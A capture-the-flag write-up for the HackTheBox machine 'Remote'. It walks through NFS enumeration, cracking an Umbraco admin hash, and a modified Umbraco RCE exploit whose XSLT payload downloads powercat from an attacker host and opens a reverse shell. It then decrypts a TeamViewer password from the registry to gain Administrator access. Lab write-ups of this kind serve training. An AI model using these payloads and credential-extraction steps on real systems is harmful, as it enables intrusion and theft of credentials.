Remote Writeup — HackTheBox
TL:DR
This is the first Windows box that I have done a proper writeup for. I don’t have much experience with Windows boxes but I tried not to skid my way through this one. There is a Network File Share that contain credentials that can be used to exploit Umbraco. For the root flag, Teamviewer is used get credential for Administrator.
Reconnaissance
We start things out with a good old NMAP scan.
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsWith all these ports, the first question that comes to mind is where do I start? The site hosted on port 80 is an ecommerce site.
To speed up things I used Gobuster to get a listing of the website pages. This revealed the following pages:
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://remote.htb/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/08/24 20:42:20 Starting gobuster
===============================================================
/about-us (Status: 200)
/blog (Status: 200)
/Blog (Status: 200)
/contact (Status: 200)
/Contact (Status: 200)
/home (Status: 200)
/Home (Status: 200)
/install (Status: 302)
/intranet (Status: 200)
/people (Status: 200)
/People (Status: 200)
/person (Status: 200)
/products (Status: 200)
/Products (Status: 200)
/umbraco (Status: 200)
===============================================================
2020/08/24 20:44:25 Finished
===============================================================Of all these endpoints, Umbraco is the most interesting. It takes you to a landing page that required username and password to login.
With some Googling you can find that there is an authenticated RCE exploit for Umbraco. Since I did not have any valid credentials at this point I decide to shelve this exploit for now.
Moving on to the other ports. Port 2049 is running NFS. We can attach to it and view its contents.
kali@kali:~/HTB/NewRemote$ mkdir /mnt/remote
kali@kali:~/HTB/NewRemote$ sudo mount -t nfs 10.10.10.180:/ /mnt/remote/
kali@kali:~/HTB/NewRemote$ cd /mnt/remote/
kali@kali:/mnt/remote$ ls
site_backups
kali@kali:/mnt/remote$The contents of site_backups is the code for the application hosted on /umbraco . Poking around, you will find a .sdf file that contains admin credentials (as hash).
kali@kali:/mnt/remote/site_backups/App_Data$ ls
cache Logs Models packages TEMP umbraco.config Umbraco.sdf
kali@kali:/mnt/remote/site_backups/App_Data$ strings Umbraco.sdf
...
dministratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa
{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
...This hash found here can be easily cracked.
admin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}This can be cracked with Hashcat but I chose to use CrackStation. The password is revealed to be baconandcheese .
With these credentials, we can run the exploit for Umbraco.
User Exploit
The exploit is a python code (Exploit DB — https://www.exploit-db.com/exploits/46153). This exploit is hardcoded to run calc.exe but in our case we want a reverse shell. The payload will look this the following:
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "IEX(New-Object System.Net.WebClient).DownloadString('http://<your ip>:8000/powercat.ps1');powercat -c <your ip> -p 1337 -e cmd"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
proc.StartInfo.FileName = "powershell"; proc.StartInfo.Arguments = cmd;\
proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
</msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
</xsl:template> </xsl:stylesheet> ';The payload in this case, invoke Powershell, downloads and uses powercat to initiate a reverse shell.
IEX(New-Object System.Net.WebClient).DownloadString('http://<your ip>:8000/powercat.ps1');powercat -c <your ip> -p 1337 -e cmdFrom here on, getting the user flag was very straight forward
kali@kali:~$ listen 1337
listening on [any] 1337 ...
connect to [10.10.15.6] from (UNKNOWN) [10.10.10.180] 49686
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved....
c:\>cd Users
cd Users
c:\Users>cd Public
cd Public
c:\Users\Public>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE23-EB3E
Directory of c:\Users\Public02/20/2020 03:42 AM <DIR> .
02/20/2020 03:42 AM <DIR> ..
02/19/2020 04:03 PM <DIR> Documents
09/15/2018 03:19 AM <DIR> Downloads
09/15/2018 03:19 AM <DIR> Music
09/15/2018 03:19 AM <DIR> Pictures
08/25/2020 08:00 PM 34 user.txt
09/15/2018 03:19 AM <DIR> Videos
1 File(s) 34 bytes
7 Dir(s) 19,394,109,440 bytes freec:\Users\Public>
More Reconnaissance
Root had a red herring for the service UsoSvc. I spent way more time than I should going down this rabbit hole.
Moving on, Teamviewer was revealed to be running on the box. After looking around, I stumbled on an article that shows how TeamViewer stores user passwords encrypted with AES-128-CBC with they key of 0602000000a400005253413100040000 and iv of 0100010067244F436E6762F25EA8D704 in the Windows registry. The goal was to extract these keys from registry, decrypt them and hope there are used as credentials elsewhere.
There is a metasploit module available for this but I decide to go the non metasploit route. Looking at the module code, you can see what registries it tries to access.
keys = [
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version7", "Version" ],
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version8", "Version" ],
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version9", "Version" ],
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version10", "Version" ],
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version11", "Version" ],
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version12", "Version" ],
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version13", "Version" ],
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version14", "Version" ],
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version15", "Version" ],
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer", "Version" ],
[ "HKLM\\SOFTWARE\\TeamViewer\\Temp", "SecurityPasswordExported" ],
[ "HKLM\\SOFTWARE\\TeamViewer", "Version" ],
]And also what values it tries to retrieve
secpass = registry_getvaldata(p, "SecurityPasswordAES")
secpasse = registry_getvaldata(p, "SecurityPasswordExported")
servpass = registry_getvaldata(p, "ServerPasswordAES")
proxpass = registry_getvaldata(p, "ProxyPasswordAES")
license = registry_getvaldata(p, "LicenseKeyAES")Also to aid with our manual process, the authors of this metasploit module (https://whynotsecurity.com/), also created a ad-hoc python decryption code we can leverage — https://gist.github.com/rishdang/442d355180e5c69e0fcb73fecd05d7e0#file-teamviewer_password_decrypt-py.
Armed with this we can move on with the exploit. From within Powershell
Get-ItemProperty -Path HKLM:SOFTWARE\WOW6432Node\TeamViewer\Version7StartMenuGroup : TeamViewer 7
InstallationDate : 2020-02-20
InstallationDirectory : C:\Program Files (x86)\TeamViewer\Version7
Always_Online : 1
Security_ActivateDirectIn : 0
Version : 7.0.43148
ClientIC : 301094961
PK : {191, 173, 42, 237...}
SK : {248, 35, 152, 56...}
LastMACUsed : {, 005056B9B56E}
MIDInitiativeGUID : {514ed376-a4ee-4507-a28b-484604ed0ba0}
MIDVersion : 1
ClientID : 1769137322
CUse : 1
LastUpdateCheck : 1584564540
UsageEnvironmentBackup : 1
SecurityPasswordAES : {255, 155, 28, 115...}
MultiPwdMgmtIDs : {admin}
MultiPwdMgmtPWDs : {357BC4C8F33160682B01AE2D1C987C3FE2BAE09455B94A1919C4CD4984593A77}
Security_PasswordStrength : 3
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer\Vers
ion7
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer
PSChildName : Version7
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
Since we only see SecurityPasswordAES, we can get the value and decrypt it.
91(New-Object -ComObject WScript.Shell).RegRead("HKLM\SOFTWARE\WOW6432Node\TeamViewer\Version7\SecurityPasswordAES")
255
155
28
115
214
107
206
49
172
65
62
174
19
27
70
79
88
47
108
226
209
225
243
218
126
141
55
107
38
57
78
91The output is a list of base 10 integers, we can covert these easily to base 16.
ff9b1c73d66bce31ac413eae131b464f582f6ce2d1e1f3da7e8d376b26394e5bAnd then decrypt the result is as follows
kali@kali:~/HTB/newremote$ python teamviewer.py
00000000: 21 00 52 00 33 00 6D 00 30 00 74 00 65 00 21 00 !.R.3.m.0.t.e.!.
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
None
!R3m0te!Root Exploit
With this credential, we can login into the box as Administrator with evil-winrm and get the root flag.
kali@kali:~/HTB/newremote$ evil-winrm -i 10.10.10.180 -u Administrator -p '!R3m0te!'Evil-WinRM shell v2.3Info: Establishing connection to remote endpoint*Evil-WinRM* PS C:\Users\Administrator\Documents> lsDirectory: C:\Users\Administrator\DocumentsMode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/19/2020 4:26 PM SQL Server Management Studio
d----- 2/20/2020 12:05 AM Visual Studio 2017*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> lsDirectory: C:\Users\Administrator\DesktopMode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/26/2020 12:49 AM 34 root.txt*Evil-WinRM* PS C:\Users\Administrator\Desktop>
